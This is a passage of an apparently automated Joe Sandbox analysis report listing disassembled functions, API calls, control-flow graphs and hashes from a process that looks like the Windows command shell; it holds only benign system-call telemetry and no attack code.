                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ConsoleTitlewcschr
                                              • String ID: /$:
                                              • API String ID: 2364928044-4222935259
                                              • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                              • Instruction ID: 703023586abbfd6ef03f8b7b566fa68959eb08e141c276bcfd451d7eb1c1ea26
                                              • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                              • Instruction Fuzzy Hash: 55C1DF63A0865281EB549B25D4143F963A1FF8ABB8F548131D91EC32F5DFBEE444C70A
                                              Function 00007FF6EB188D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1171 7ff6eb188d80-7ff6eb188da2 1172 7ff6eb188da4-7ff6eb188daf 1171->1172 1173 7ff6eb188db1-7ff6eb188db4 1172->1173 1174 7ff6eb188dcc 1172->1174 1175 7ff6eb188dbf-7ff6eb188dca Sleep 1173->1175 1176 7ff6eb188db6-7ff6eb188dbd 1173->1176 1177 7ff6eb188dd1-7ff6eb188dd9 1174->1177 1175->1172 1176->1177 1178 7ff6eb188de7-7ff6eb188def 1177->1178 1179 7ff6eb188ddb-7ff6eb188de5 _amsg_exit 1177->1179 1180 7ff6eb188df1-7ff6eb188e0a 1178->1180 1181 7ff6eb188e46 1178->1181 1182 7ff6eb188e4c-7ff6eb188e54 1179->1182 1183 7ff6eb188e0e-7ff6eb188e11 1180->1183 1181->1182 1184 7ff6eb188e73-7ff6eb188e75 1182->1184 1185 7ff6eb188e56-7ff6eb188e69 _initterm 1182->1185 1186 7ff6eb188e13-7ff6eb188e15 1183->1186 1187 7ff6eb188e38-7ff6eb188e3a 1183->1187 1188 7ff6eb188e80-7ff6eb188e88 1184->1188 1189 7ff6eb188e77-7ff6eb188e79 1184->1189 1185->1184 1192 7ff6eb188e17-7ff6eb188e1b 1186->1192 1193 7ff6eb188e3c-7ff6eb188e41 1186->1193 1187->1182 1187->1193 1190 7ff6eb188eb4-7ff6eb188ec8 call 7ff6eb1837d8 1188->1190 1191 7ff6eb188e8a-7ff6eb188e98 call 7ff6eb1894f0 1188->1191 1189->1188 1200 7ff6eb188ecd-7ff6eb188eda 1190->1200 1191->1190 1201 7ff6eb188e9a-7ff6eb188eaa 1191->1201 1195 7ff6eb188e2d-7ff6eb188e36 1192->1195 1196 7ff6eb188e1d-7ff6eb188e29 1192->1196 1198 7ff6eb188f28-7ff6eb188f3d 1193->1198 1195->1183 1196->1195 1203 7ff6eb188ee4-7ff6eb188eeb 1200->1203 1204 7ff6eb188edc-7ff6eb188ede exit 1200->1204 1201->1190 1205 7ff6eb188ef9 1203->1205 1206 7ff6eb188eed-7ff6eb188ef3 _cexit 1203->1206 1204->1203 1205->1198 1206->1205
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                              • String ID:
                                              • API String ID: 4291973834-0
                                              • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                              • Instruction ID: 76bf44009fe9e2fb4cc2733bea975e69954c37ffccd4f1ba3cfff9aa3c8e56b4
                                              • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                              • Instruction Fuzzy Hash: 1141D433A08A4286FA519B14E9403F962A1BF5C3ACF144436D95DD76B0DF7EF8488B4A
                                              Function 00007FF6EB1789C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1207 7ff6eb1789c0-7ff6eb178a3d memset call 7ff6eb17ca40 1210 7ff6eb178a43-7ff6eb178a71 GetDriveTypeW 1207->1210 1211 7ff6eb178ace-7ff6eb178adf 1207->1211 1212 7ff6eb18b411-7ff6eb18b422 1210->1212 1213 7ff6eb178a77-7ff6eb178a7a 1210->1213 1214 7ff6eb178aed 1211->1214 1215 7ff6eb178ae1-7ff6eb178ae8 ??_V@YAXPEAX@Z 1211->1215 1218 7ff6eb18b430-7ff6eb18b435 1212->1218 1219 7ff6eb18b424-7ff6eb18b42b ??_V@YAXPEAX@Z 1212->1219 1213->1211 1216 7ff6eb178a7c-7ff6eb178a7f 1213->1216 1217 7ff6eb178aef-7ff6eb178b16 call 7ff6eb188f80 1214->1217 1215->1214 1216->1211 1220 7ff6eb178a81-7ff6eb178ac8 GetVolumeInformationW 1216->1220 1218->1217 1219->1218 1220->1211 1222 7ff6eb18b3fc-7ff6eb18b40b GetLastError 1220->1222 1222->1211 1222->1212
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DriveErrorInformationLastTypeVolume
                                              • String ID:
                                              • API String ID: 850181435-0
                                              • Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                              • Instruction ID: 8e3b18f6e5c41660923f9c67f205080ebb5a76db68c77cff41229934961a647d
                                              • Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                              • Instruction Fuzzy Hash: 9D418F33608BD1C9E7618F21E8443E977A4FB8DB58F444125DA4D8BBA8CF3AD649C705
                                              Function 00007FF6EB184A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1224 7ff6eb184a14-7ff6eb184a3e GetEnvironmentStringsW 1225 7ff6eb184a40-7ff6eb184a46 1224->1225 1226 7ff6eb184aae-7ff6eb184ac5 1224->1226 1227 7ff6eb184a59-7ff6eb184a8f GetProcessHeap RtlAllocateHeap 1225->1227 1228 7ff6eb184a48-7ff6eb184a52 1225->1228 1230 7ff6eb184a91-7ff6eb184a9a memmove 1227->1230 1231 7ff6eb184a9f-7ff6eb184aa9 FreeEnvironmentStringsW 1227->1231 1228->1228 1229 7ff6eb184a54-7ff6eb184a57 1228->1229 1229->1227 1229->1228 1230->1231 1231->1226
                                              APIs
                                              • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A28
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A66
                                              • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A7D
                                              • memmove.MSVCRT(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A9A
                                              • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184AA2
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemmove
                                              • String ID:
                                              • API String ID: 647542462-0
                                              • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                              • Instruction ID: ad2bcc90e8e790f2d32cf5a61511d648a10f10c70b0c068c2a0bee35ec17fb20
                                              • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                              • Instruction Fuzzy Hash: 9D11C123A1474282DE109B42B0042B9BBA0FB8DFA8F598038DE0F47764DF3EE4448744
                                              Function 00007FF6EB185CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                              • String ID:
                                              • API String ID: 1826527819-0
                                              • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                              • Instruction ID: 2c1011e39b368b54b8a1e02b15760bc81a958420aa797c5f63b6289728ab88df
                                              • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                              • Instruction Fuzzy Hash: 0E012D72908682CAE6045B55E4543F9BFA1FF8E769F446134D54F863B6CF3EA0488B0A
                                              Function 00007FF6EB183060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorMode$FullNamePathwcschr
                                              • String ID:
                                              • API String ID: 1464828906-0
                                              • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                              • Instruction ID: fbd2a206eaaf719d80f471f6709ac084bab68d0ec2737bd28430e12ca9d98d01
                                              • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                              • Instruction Fuzzy Hash: AD310963A0865182E6619F15B4003FEB761FB4EBA8F588134DA5DC33F0DE7EE845470A
                                              Function 00007FF6EB17CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset
                                              • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                              • API String ID: 2221118986-3416068913
                                              • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                              • Instruction ID: 7c607c505e1544947bbf3d15b1450d4d1e7e793b8e440734624eaafa3656d340
                                              • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                              • Instruction Fuzzy Hash: 7A117322A0874281EB54CB55E1543F92390AF8DBF8F184231DD6D8B7F5EE2ED4808349
                                              Function 00007FF6EB17BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memsetwcschr
                                              • String ID: 2$COMSPEC
                                              • API String ID: 1764819092-1738800741
                                              • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                              • Instruction ID: 2eca5134221dbfd6de1287d956ef0ede4780b2ac5ee2e77c0c46a4876acda717
                                              • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                              • Instruction Fuzzy Hash: 7A517123A0866285FB649B25D4613FA23919F4EBACF044031DA4DC73F5DFAEE544878B
                                              Function 00007FF6EB182EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                              • String ID:
                                              • API String ID: 4254246844-0
                                              • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                              • Instruction ID: af03ef898b14134bc329006e2ee32e4d55c6c8b57785a6c0249134ffdcca7f61
                                              • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                              • Instruction Fuzzy Hash: CA418323A0C74286EE219B00E5543F9B7A0FF8DBA8F484531D94EC77A5DF3EE445864A
                                              Function 00007FF6EB185A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _get_osfhandle$ConsoleMode
                                              • String ID:
                                              • API String ID: 1591002910-0
                                              • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                              • Instruction ID: 52e85516d7e7b19469af8813d64f0e9a3dd2d8be7a46c06e0c4a29e14f5dedf7
                                              • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                              • Instruction Fuzzy Hash: AEF07A36A59642CBE6148B10F9953F97BA0FB8D729F454135C90E83338DF3EB4158B06
                                              Function 00007FF6EB18291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: DriveType
                                              • String ID: :
                                              • API String ID: 338552980-336475711
                                              • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                              • Instruction ID: 3ba2c17f064935a308248ff5a329a261169b4fb7da43acfaa48617cc803b8a5b
                                              • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                              • Instruction Fuzzy Hash: 36E06D6762864086E7209B60E4511AAB7A0FB8D758F841525EA8D83734DF3CD249CF0D
                                              Function 00007FF6EB185AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB17CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDA6
                                                • Part of subcall function 00007FF6EB17CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDBD
                                              • GetConsoleTitleW.KERNELBASE ref: 00007FF6EB185B52
                                                • Part of subcall function 00007FF6EB184224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB184297
                                                • Part of subcall function 00007FF6EB184224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB1842D7
                                                • Part of subcall function 00007FF6EB184224: memset.MSVCRT ref: 00007FF6EB1842FD
                                                • Part of subcall function 00007FF6EB184224: memset.MSVCRT ref: 00007FF6EB184368
                                                • Part of subcall function 00007FF6EB184224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB184380
                                                • Part of subcall function 00007FF6EB184224: wcsrchr.MSVCRT ref: 00007FF6EB1843E6
                                                • Part of subcall function 00007FF6EB184224: lstrcmpW.KERNELBASE ref: 00007FF6EB184401
                                              • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF6EB185BC7
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                              • String ID:
                                              • API String ID: 346765439-0
                                              • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                              • Instruction ID: 535165e24c0ab43adbcea4281f78fc8b897341e21a0f76b907346d9ae0a85b8d
                                              • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                              • Instruction Fuzzy Hash: BB31B522A0C64286FA20A711A4903FD6395FF8DBE8F445031E94EC7BB5DF3EE501870A
                                              Function 00007FF6EB183A0C Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                              Download Yara Rule
                                              APIs
                                              • FindClose.KERNELBASE(?,?,?,00007FF6EB19EAC5,?,?,?,00007FF6EB19E925,?,?,?,?,00007FF6EB17B9B1), ref: 00007FF6EB183A56
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseFind
                                              • String ID:
                                              • API String ID: 1863332320-0
                                              • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                              • Instruction ID: bf39b40a4e348e1421e51bed70a2589422c11c5e813be88d4fc89ea7e93d03e3
                                              • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                              • Instruction Fuzzy Hash: DA01D622E08643D5E6548755B6503F566A1FF8CBA8B588030E50DC32B4DF2DF5828309
                                              Function 00007FF6EB189A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
